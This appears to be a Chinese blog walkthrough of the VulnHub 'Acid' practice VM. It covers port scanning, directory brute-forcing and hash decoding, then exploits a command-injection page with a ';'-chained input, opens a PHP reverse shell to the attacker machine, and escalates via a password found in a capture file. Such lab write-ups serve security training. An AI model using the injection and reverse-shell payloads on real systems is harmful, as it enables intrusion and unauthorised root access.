vulnhub acid

配置环境
攻击机kali : nat模式 ip:192.168.110.128
靶机: nat模式

使用nmap -sP 192.168.110.0/24 扫描出来靶机ip : 192.168.110.130
然后使用nmap -sS 192.168.110.130 -p 1-65535扫描端口,只扫描到33447/tcp端口
在这里插入图片描述

使用火狐访问页面:http://192.168.110.130:33447
在这里插入图片描述
查看源码,拉到最下面,发现0x643239334c6d70775a773d3d
在这里插入图片描述
使用kali中的dirb爆破目录

使用bp编码器
在这里插入图片描述
出现wow.jpg
访问http://192.168.110.130/images/wow.jpg
在这里插入图片描述
右键另存为到桌面,使用notepad++打开,发现
最后有数字
在这里插入图片描述
冒号去掉;
解码出来的值位7aee0f6d588ed9905ee37f16a7c610d4
是32位数字,有可能是md5加密
解密后:63425

继续使用dirb爆破目录
发现cake.php,
查看源码,title是/Magic_Box,猜测是目录
对http://192.168.110.130:33447/Challenge/Magic_Box/进行爆破
发现command.php,是命令执行页面
尝试输入命令:
127.0.0.1;ifconfig
出来结果,发现命令注入漏洞

kali nc监听:
在这里插入图片描述
在命令执行进行php反弹shell
127.0.0.1;php -r ‘$sock=fsockopen(“192.168.56.101”,5555);exec("/bin/bash -i <&3 >&3 2>&3");’
反弹成功

查找每个用户的文件
find / -user 用户名称 2>/dev/null -ls
在这里插入图片描述

发现/sbin/raw_vs_isi/hint.pcapng文件,这是一个网络流量抓包文件
在靶机上cd到/sbin/raw_vs_isi/目录
用python开HTTP服务
python -m SimpleHTTPServer 8080
然后在攻击机kali上 访问 http://192.168.110.130:8080进行下载
然后用wireshark打开,只看TCP协议的包,发现saman的密码:1337hax0r
在这里插入图片描述
su saman
输入密码1337hax0r
提权
sudo -i
输入密码1337hax0r
在这里插入图片描述
cat flag.txt
在这里插入图片描述
得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值